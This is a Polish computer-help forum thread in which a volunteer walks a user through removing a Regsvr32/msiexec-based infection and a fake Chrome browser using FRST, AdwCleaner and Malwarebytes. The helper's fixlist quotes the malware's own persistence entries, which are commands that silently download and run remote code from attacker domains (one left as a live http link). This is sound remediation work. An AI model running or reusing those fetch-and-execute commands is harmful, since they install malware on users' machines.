Skocz do zawartości

Jak usunąć URL:Mal "lotusiloveyou"


Rekomendowane odpowiedzi

Witam,
To mój pierwszy post na tym forum. Od kilku dni mam problem - avast ciągle wyświetla monity o malware "llotusiloveyou". Z monitu wynika, że jest on związany z procesem Regserv32. Skanowanie nic nie daje, nie usuwa niczego. Zgodnie z informacją na forum przeskanowałem komputer za pomocą FRST i GMER-a, AdwCleanera gmera nie mogę załączyć bo wyskakuje ze nie mam uprawnień ale  jak będzie potrzebne to podam jakoś

proszę o pomoc

pozdrawiam

Addition.txt

AdwCleanerS0.txt

FRST.txt

Shortcut.txt

Odnośnik do komentarza
Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.

System jest zainfekowany tą wyjątkową sławną infekcją w ostatnim czasie, oprócz tego dochodzi jeszcze wątpliwy skaner, fałszywa przeglądarka podszywająca się pod Google Chrome i ogólny nieład. 

 

1. Przez panel sterowania odinstaluj:

  • Wątpliwe skanery / oprogramowanie: YAC(Yet Another Cleaner!).
2. Otwórz Notatnik w nim wklej: 

 

CloseProcesses:
CreateRestorePoint:
HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== /q
CHR StartupUrls: Default -> "hxxp://feed.helperbar.com/?publisher=OC&dpid=OC&co=PL&userid=fcbbdada-8d0f-4e30-81d6-78bc5b3f5fb7&affid=113129&searchtype=hp&babsrc=lnkry","hxxp://www.interia.pl/#utm_source=instalki1&utm_medium=installer&utm_campaign=instalki1&iwa_source=installer_instalki","hxxp://www.omniboxes.com/?type=hp&ts=1453675607&z=ba7d726f9838c2429ec3b41gaz6w9cfq2m5wbq7efm&from=amt&uid=wdcxwd10jpcx-24ue4t0_wd-wxm1e83vhj92vhj92"
HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) 
RemoveDirectory: C:\Program Files (x86)\Boxbob
RemoveDirectory: C:\Users\Arczi\AppData\Local\Boxbob
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-25] () 
RemoveDirectory: C:\Program Files (x86)\Firefox
RemoveDirectory: C:\Users\Arczi\AppData\Roaming\Firefox
RemoveDirectory: C:\Users\Arczi\AppData\Local\Firefox
R2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [brak podpisu cyfrowego] 
U3 kxldrpob; \??\C:\Users\Arczi\AppData\Local\Temp\kxldrpob.sys [X] 
HKU\S-1-5-21-1625667741-3387903260-1302171998-1001\...\ChromeHTML: -> C:\Program Files (x86)\Boxbob\Application\chrome.exe (Google Inc.) 
Task: {39AB3992-685C-4C43-BF2B-267874318720} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lotusiloveyou.com/?data=zDlkMj1XFjIcOTFdNYYdF8U1FTVQMdVWMWF4MdqdNYEyN8Y8RH== scrobj.dll
Task: {BCA1E17D-E930-47CC-A8D9-AF0F275A907B} - System32\Tasks\T0528 => msiexec.exe /i hxxp://point.chcyhqc.com/anzhaungoimism3.dat /q
C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
FirewallRules: [{28F4CBD1-61EB-4D72-B858-FD0972534239}] => (Allow) C:\Program Files (x86)\Boxbob\Application\chrome.exe
FirewallRules: [{C5F00FDE-B5CF-49D8-8B76-81C27025C315}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{F6C7D29A-DFC8-45CD-8919-1056F46D94F2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Arczi\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
C:\Users\Arczi\AppData\Local\Mozilla
C:\Users\Arczi\AppData\Roaming\Mozilla
C:\Users\Arczi\AppData\Roaming\Profiles
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Wyczyść i zabezpiecz przeglądarkę Google Chrome:

  • Zresetuj synchronizację (o ile włączona): KLIK.
  • Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia.
  • Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone.
  • Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google.
  • Zainstaluj rozszerzenie blokujące reklamy o podłożu nieinfekcyjnym, polecam rozszerzenie uBlock Origin
  • Ustaw jakąkolwiek zaufaną przeglądarkę jako domyślną, najlepiej Google Chrome. To wymagany krok to kasacji modyfikacji infekcji. 
4. Pomimo wszczęsniejszych akcji z AdwaCleaner: pobierz AdwCleaner uruchom go i kliknij Skanuj, a gdy uaktywni się przycisk Oczyść kliknij go. Dostarcz raport z tego działania.

 

5. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry).

 

boxbob;firefox

 

Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum.

 

6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza

Do kasacji szczątkowe klucze od fałszywej przeglądarki. Przeprowadzimy końcowy skan, podsumujemy wyniki i będziemy kończyć. 
 
1. Start narzędzia komend.

  • Kliknij jednocześnie klawisz winkey.png oraz R. Uruchomi się narzędzie Uruchamianie.
  • W polu ścieżek wpisz CMD.EXE i kliknij klawisz ENTER.
  • Uruchomi się okno konsoli komend. 

2. Użycie odpowiednich komend.

  • W oknie konsoli komend wklej poniższą komendę. 

reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Boxbob" /f
reg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Boxbob" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefox" /f

reg delete "HKEY_USERS\S-1-5-21-1625667741-3387903260-1302171998-1001\SOFTWARE\Firefox" /f

  • Rozpocznie się kasacji kluczy, czekaj, a gdy proces dobiegnie końca uruchom ponownie system.

3. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

 

4. Podsumuj obecny stan systemu.

Odnośnik do komentarza

Wszystkie detekcja daj do usuwania. Następnie zmień hasła we wszystkich serwisach logowania, a szczególnie w banku. Martwą mnie te detekcje: Trojan.WisdomEyes / Trojan.Downloader.D.Generic, ale zakładam, że MBAM usunął je pomyślnie. 

 

Kończymy, ale proszę na bieżąco obserwować system. 

 

Zastouj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne oraz Windows.

Uaktualni również bazy oprogramowania zabezpieczającego i wykonaj nim pełne skanowanie systemu (raczej już nic nie powinno być wykryte).

Odnośnik do komentarza

Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto

Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.

Zarejestruj nowe konto

Załóż nowe konto. To bardzo proste!

Zarejestruj się

Zaloguj się

Posiadasz już konto? Zaloguj się poniżej.

Zaloguj się
  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...